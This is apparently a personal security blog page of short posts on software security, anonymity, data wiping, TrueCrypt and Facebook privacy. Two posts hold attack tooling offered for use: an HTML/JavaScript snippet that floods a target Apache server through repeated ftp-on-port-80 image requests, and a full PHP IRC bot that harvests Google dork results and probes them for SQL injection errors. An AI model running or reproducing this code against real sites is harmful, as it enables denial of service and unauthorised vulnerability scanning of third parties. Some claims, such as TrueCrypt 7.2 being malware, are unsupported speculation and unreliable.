Software Quality and Security

Posted on by
Reply

Hello friends, it’s a while, a long while, today I am going to talk about software quality and security.

Web services are being penetrated in many ways every day, why?

One of the main reasons this is happening, is because most companies and software developers use open-source, ready-to-go, all included software to minimize the workload and hours needed as well as promote better deliverability times. But this poses threats, such as ‘everyone can get a copy of the code you are running’ and try to find vulnerabilities and ways to exploit it directly itself or the systems residing underneath.

Could this be prevented or at the very least harder for intruders to successfully penetrate? And if so, how?

I always hear the same argument about time equals money and quality costs. But there is always a middle ground solutions for such things. Many software houses who take their business seriously, create their own, custom software, tailor-made to their needs and their target-group (clientèle). They create the core system once and they use this core system on all on their projects, which means higher quality, higher security as the code is proprietary which results in the term “Security through Obscurity”, higher scalability and of course they are able to meet and handle custom client demands much more efficiently.

There are more benefits to this business model, such as, lower resources required as the software requires exactly what it needs to run, less development costs as it is custom and the developers working on it are fully familiar with the code and usually they do not need to re-write parts of it or create work-arounds to bypass issues, as well as keeping the staff highly technologically educated regarding the latest coding techniques, principles etc.

But there are downsides too, it costs more money to start this model, in other words you need to invest in your business model and in your team, takes more time for the 1st deployment, takes highly-skilled staff to develop it. But in the long-run it will become a very good investment versus the chaotic open-source approach, which is led by 3rd party communities and this year their software may suit your needs but the next one may not, or may not exist at all.

The final decision is yours, I personally as a software engineer, I take the custom approach, custom core system, use it on my all clients, constantly expanding it, the more I expand it, the less I need “ready to go” conventions.

Have a nice day!

 

Javascript apache ddos

Posted on by
Reply

Something quick to share with you before I forget it 🙂

<html><body>
<script>
       for (var i = 0; i < 100; i++) {
             var img = new Image();
             var url = 'ftp://victim.com:80/?'+i;
             img.src = url;
       }
</script>
</body></html>

I use ftp because http has a limit of 6 simultaneous connections on most browsers, on the other hand ftp has no limit to the day I write this post.

Be sane on how you use it!!!

(Original attack demonstration on BlackHat 2013, Las Vegas)

IRC Client – Website Vulnerability scanner

Posted on by
Reply

Hey guys,

This script could only be used as template to create a PHP-based IRC Client/Bot, its vulnerability scanning functions are now useless.

This one comes from the Dark Ages of GRnet, enjoy 🙂

In any case I do not have any responsibility on how the script runs and what errors might pop up on your computer.

<?php

set_time_limit(0);

/**
 * @author Atlantean.
 */

//########################INFORMATION##################################

$server = "global.irc.gr";
$port = 6667;
$me = "php_scanner";
$channel = "#scripting";
$identify = "id";
$master = array("Atlantean");

//EDIT THIS
$max_results = 500; // maximum Google results //
$threads = 10; //URLS TO test IN the same time!!

//#####################################################################

$search = array("mysql_num_rows()", "mysql_fetch_rows()", "main(", "extract()",
    "mysql_result()", "Syntax Error", "You Have An error", "mysql error",
    "SQL ERROR", "Warning: ");
//###############################SERVER WRITE##########################

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!socket_connect($socket, $server, $port))
{
    echo "\n[-]Unable To connect...\n\n\n";
    exit;
}

socket_write($socket, "USER php 127.0.0.1 PHP :PHP Bot\nNICK $me\nJOIN :$channel\n");


//###############################Encode The Dork#############################

function encodeDork($s)
{
    $tmp = "";
    for ($i = 0; $i < strlen($s); $i++)
    {
        $tmp .= "&#" . hexdec(bin2hex($s[$i])) . ";";
    }
    return urlencode($tmp);
}

//###############################cURL MULTI THREAD#############################

function ExecHandle(&$curlHandle)
{
    $flag = null;
    do
    {
        curl_multi_exec($curlHandle, $flag);
    } while ($flag > 0);
}


while ($read = socket_read($socket, 2048))
{
    $cmd = explode(" ", $read);
    $nick = explode(':', $cmd[0]);
    $nick = explode('!', $nick[1]);
    $nick = strtolower($nick[0]);

    switch ($cmd[1])
    {
        case "KICK":
            if ($cmd[3] == $me)
            {
                socket_write($socket, "\nJOIN :" . $channel . "\n");
            }
            break;
        case "PRIVMSG":
            if (in_array($nick, $master))
            {
                switch (str_replace(array(chr(10), chr(13)), '', $cmd[3]))
                {
                    case ":!join":
                        socket_write($socket, "\nJOIN :" . $cmd[4] . "\n");
                        break;
                    case ":!exit":
                        exit(socket_write($socket, "\nQUIT :Connection Lost\n"));
                        break;
                    case ":!part":
                        socket_write($socket, "\nPART :" . $cmd[4] . "\n");
                        break;
                    case ":!sql":
                        if (!isset($cmd[4]))
                        {
                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                "12[-] Enter Dork!\r\n");
                        } else
                        {
                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                "12[+] SQL Vulnerabilty Scan Started ...\nPRIVMSG $channel :" . chr(3) . "4$nick " .
                                chr(3) . "12[+] Dork : $cmd[4] \r\n");

                            $vuln_array = array();

                            $google = "http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=0";

                            $ch = curl_init($google);
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                            curl_setopt($ch, CURLOPT_HEADER, 0);
                            $ret = curl_exec($ch);
                            curl_close($ch);

                            if (stristr($ret, '302 Moved') != false)
                            {
                                socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[-] Banned From Google!! \r\n");
                                break;
                            }

                            preg_match_all("/of( about)* <b>([\d,]+)<\/b>/", $ret, $max);
                            $max = str_replace(",", "", $max[2][0]);

                            $max = $max > $max_results ? $max_results : $max;
                            $i = 0;

                            while ($i < $max)
                            {

                                $ch = curl_init("http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=" . $i);
                                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                                curl_setopt($ch, CURLOPT_HEADER, 0);
                                $ret = curl_exec($ch);

                                preg_match_all("/<h3 class=r><a href=\"(.*?)\"/", $ret, $links);

                                if (@$links[1])
                                {
                                    foreach ($links[1] as $l)
                                    {
                                        if (strpos($l, '=') != false)
                                        {
                                            $url = explode('=', $l);
                                            $url = $url[0] . "='";
                                            if (!in_array($url, $vuln_array))
                                            {
                                                array_push($vuln_array, $url);
                                            }
                                        }
                                    }
                                }

                                curl_close($ch);
                                $i = $max > 10 ? $i += 10 : $i++;
                            }

                            array_unique($vuln_array);
                            sort($vuln_array);

                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Got " . count($vuln_array) . " Valid URLs! Injection Started...\r\n");

                            $p = 0;
                            $o = $threads;

                            $curlHandle = curl_multi_init();

                            do
                            {

                                $tmp = count($vuln_array);

                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    $cURL[$i] = curl_init($vuln_array[$i]);
                                    curl_setopt($cURL[$i], CURLOPT_URL, $vuln_array[$i]);
                                    curl_setopt($cURL[$i], CURLOPT_HEADER, 0);
                                    curl_setopt($cURL[$i], CURLOPT_RETURNTRANSFER, true);
                                    curl_multi_add_handle($curlHandle, $cURL[$i]);
                                }

                                ExecHandle($curlHandle);

                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    $source[$i] = curl_multi_getcontent($cURL[$i]);
                                }


                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    foreach ($search as $error)
                                    {
                                        if (stristr($source[$i], $error) != false)
                                        {
                                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                                "12[+] Possible Bug Found: $vuln_array[$i]\n");
                                            $p++;
                                            break;
                                        }
                                    }
                                }


                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    curl_multi_remove_handle($curlHandle, $cURL[$i]);
                                    unset($vuln_array[$i]);
                                }
                                sort($vuln_array);

                                socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                    "12[+] Scanned $o...\r\n");
                                $o += $threads;

                                unset($source);
                                unset($cURL);

                            } while (count($vuln_array) > 0);

                            curl_multi_close($curlHandle);

                            unset($vuln_array);
                            unset($source);
                            unset($cURL);

                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Done. $p Bugs Found.\r\n");
                        }
                        break;
                }
            }
            break;
    }

    if ($cmd[0] == "PING")
    {
        socket_write($socket, "PONG " . $cmd[1] . "\n");
    }
}
socket_close($socket);
?>

CSRF attack

Posted on by
Reply

It’s been long since the last time I blogged but some things I took on were very time-consumptive, today we’ll talk about CSRF.

CSRF? What is that?

CSRF stands for cross-site request forgery, and it almost always leads to bad, nasty things. It can damage your bank account balance, it acts on your behalf on your website activities without your consent or you even knowing about it until it’s very late.

However, if a website has taken precautions about this type of attack such as CSRF one-time tokens, it’s renders the attack completely harmless because the web server will not accept the requests sent by 3rd parties.

For more details one good article I spotted is on: https://www.acunetix.com/websitesecurity/csrf-attacks/

Aimilios

 

TrueCrypt no longer supported

Posted on by
Reply

Hello fellow security conscious citizens of the Internet!

On the 24th of May 2014 the TrueCrypt Organization stopped the support and development of its industry leading encryption project called “TrueCrypt” which provided powerful encryption to thousands of computers claiming to have done that because Microsoft stopped windows XP support.

Well that’s bollocks if you ask me 🙂

Governmental agencies probably found these so called “anonymous” developers and either bribed or forced them to stop the development of TrueCrypt as it stonewalled governments from obtaining digital data and building cases against criminals, or they were bought off, what ever the scenario I highly doubt anyone with an average IQ believes the official statement of TrueCrypt.

Now the important things, alternatives to TrueCrypt? Many many many of them, so there’s no need to worry, just migrate from TrueCrypt to a similar OPEN-SOURCE application, similar to TrueCrypt is the DiskCryptor.

WARNING: In my opinion don’t even run or install TrueCrypt 7.2 because I believe it contains malware that could expose your data to 3rd parties that had to do with this security scandal.

Data security

Posted on by
Reply

Is your data safe? Probably not if you haven’t taken precautions.

DATA WIPING / DATA MINING

First of all let’s make something clear, deleting a file means deleting the entry of it from the hard disk and unless it’s overwritten with something else it still exists. So formating and reformating won’t save you unless you wipe your hard disk, solid state devices wiping is a little more complicated so I won’t go into details.

So if you want to sell your hard drive, wipe it first several times, usually 3 or 7 wipes known as the DOD standard wipe are enough to make all the data unrecorevable without someone spending a fortune ($100.000,00) on examining the hard drive with advanced equipment. If it’s a SSD use its wiping software contributed by its manufacturer. If it’s a usb flash drive the best you can do is overwrite gazillion times or just burn it literally.

ON-LINE CLOUD SERVICES

You want to files backed up? Don’t use cloud services without encrypting them before the transmission(upload) even though encryptions can be broken depending who trying to break it and the computing power he has. All the sites advertise that their servers are encrypted blah blah however you can never check it for sure. So 2 things, never upload unencrypted files and never upload important files like business project etc, bottom line encryption can be broken which means clouds are insecure.

FULL DISK(SYSTEM) ENCRYPTION (FDE)

Thousands of computers are being stolen every hour mostly laptops, smartphones, tablets, netbooks and not so often desktops. Front-end passwords won’t save you, so here comes full disk encryption to protect your data by making it accessible only by entering the right passphrase/key/password or/and some key-file(some mp3 song for example) you only know about and carry on you on a usb flash drive attached to your keys’ chain. Forget windows encryption or mac or android, use open-source software like TrueCrypt to make sure there are no backdoors, use atleast 128-bit encryption and atleast 26+ mixed password (numbers, letters, special chars) to make it virtually impossible for anyone to crack the encryption in the near future. Note everything can be cracked however if it requires 1.000.000.000.000 years it’s a safe bet none will ever try.

BOTTOM LINE

Bottom line is, wipe your drives, encrypt your entire drives, shred your files instead of simply sending them to trash can or recycle bin, use off-line encrypted hard drives for backups and finally use strong passwords for your accounts.

Soon there will be more security articles about firewalls, internet security, encrypted data transmissions and more.

Wanna go off the grid and erase everything that goes around you on the internet?

Posted on by
Reply

Not possible.

There are only few things you can do to make it harder for the people to find your internet trail.

You have an email? Change your info to some random info, save and then cancel it. Same goes for similar accounts.

You have an e-banking account? Demand your bank to disable this specific service for you.

MSN? Cancel it.

Facebook? Erase any trail left (for example pictures, notes, friends) and then cancel. DO NOT DE-ACTIVATE, CANCEL THRU HELP ME.

Skype? Cannot be canceled but you can alternate your real profile to a fake one.

Have a personal website? Cancel it via the hosting company.

Remember everything can be cached to search engines or web-servers or can be saved to local hard drives. Example, I posted my pic on facebook, some friend of mine saved it on his computer, nothing can be done about it.

That’s all you can do to protect yourself. And of course IP logs are out of the table.

 

 

Internet and Anonimity

Posted on by
Reply

Is it possible to hide my existence on internet? You’re pretty much asking if you can exist and same time not exist.

However there are ways to make it much harder for someone to identify you on the web. The keyword here is “proxies”.

Proxy is the middleman between you and the remote server. But (there’s always a but) the data being transfered “you > ISP > proxy > proxy’s ISP > target’s ISP > target (remote server you want to reach out)” and backwards, that means if someone has access to ISP’s logs and activity can track you easily, that’s probably CIA level clearance and same level agencies.

They say be close to your friends and closer to your enemies, wise dude who ever said that.

Everything should be analyzed from the inside. So if I had all these clearances I would do:

1) create a time-window of the attack.

2) check target’s activity logs to find out which server was used as a proxy. (Let’s say we have different 1000 connections in the logs)

3) examine these 1000 connections and cross-check them with their own activity logs and and the results should be cross-checked within the time-window.

4) You have the original IP unless it was a proxy too, however the activity logs are much more to check but its still traceable. Using the same technique above, at some point you will get the original IP.

Of course original IP may have nothing to do at all with the attack, if the attacker has hacked into a wi-fi network or bluetooth or it’s internet cafe or public wi-fi. Then the digging goes way more, routers should be seized and checked for the latest mac addresses, cell towers will need to triangulate cell phones who were at the area within the time window and much more. Probably none will dig so far unless it’s critical.

Keep in mind all the above can be processed within seconds.

Satellites can be used too to define who was where and did what. There’s no way to escape unless they let you to.

Some advices to hide your tracks easily.
Wanna hide your IP to some site? Can happen, use a http proxy, or some secure sock4 or sock5 or use Tor network.
Never ever attempt anything illegal because if they want to get you, they will get you, house always wins.

Everything said was for educational purposes and should NOT be used for illegal activities.

Can my site be hacked?

Posted on by
1

The answer is yes, but lets clear some things below.

First of all in order to be hacked the hacker has to find vulnerabilities which takes some time, which rarely would spend if you are not a target. Everything can be hacked.

Usual vulns/hacks/backdoors.

Usually the hackers are searching for php vulnerabilities in the code your site is running, either is some popular CMS you downloaded or your custom php code by you or the company created your site. Some php penetration examples are SQL injection, using $_POST and $_GET commands to their favor.

Most sites are hosted in shared computers which doesn’t nesseccerily means I’m not careful they can your site through mine, but happens from time to time depending how secure and independent your account is, shared computer doesn’t always mean linked configs. They did in the past, now most companies they don’t allow global configs, each account has its own safety configuration & settings.

A backdoor can be anything, an email you misplaced in your server or something entirely different, for example a plugin your installed on your wordpress or joomla or drupal or else!

The favorite attack is DDOS (Denial of service attack) which sends more packets to your IP than your connection can download as a result slowing your site temporarily or shuts it down at completely to the web. Of course is accessible through some advanced panels or local connections. There are certain ways to protect your from DDOS such as software, firewalls or in some cases like banks, organizations like NASA, agencies etc hardware. Note this: Nothing can protect you from 100.000.000 zombie computers attacking your network, even CIA has been DDOSed and went off for a day.

Thats for today!

facebook and content copyrights

Posted on by
Reply

Hello everyone,

Did you know for every picture, personal photograph, content, post, action you make you give up your copyrights and facebook can do with it whatever it wants to do? I am sure 95% of facebook users do not know that.

The truth some times can be cruel but facebook has probably more data than your goverment, also more reliable, update to date, and know you things about you and your “friends” even F.B.I. doesn’t. They can create psycological profiles for every single user.

They use our personal data for marketing, companies invest in their statistics they produce on daily basis, that can be political exit-polls, sports, athletes, games, pretty much anything you can think of.

Account deletion: They only allow you to deactivate the service, however in help section there is a deletion, however I doubt people know about it, even that requires few weeks of inactivity. And of course once someone cached your page on google, it may be still be accessible via advanced searches.

On the other hand, let’s face it facebook is useful to stay in touch with people all around the world, mostly on-line friends from on-line games,chat rooms etc.

It’s completely up to you weither you need facebook or you don’t. I’m a programmer, a gamer too, I know what I signed up for when I will no longer need it, I will just delete it.

The best you can do is decide if you really need facebook or just logging in/out when you’re bored. You know your needs.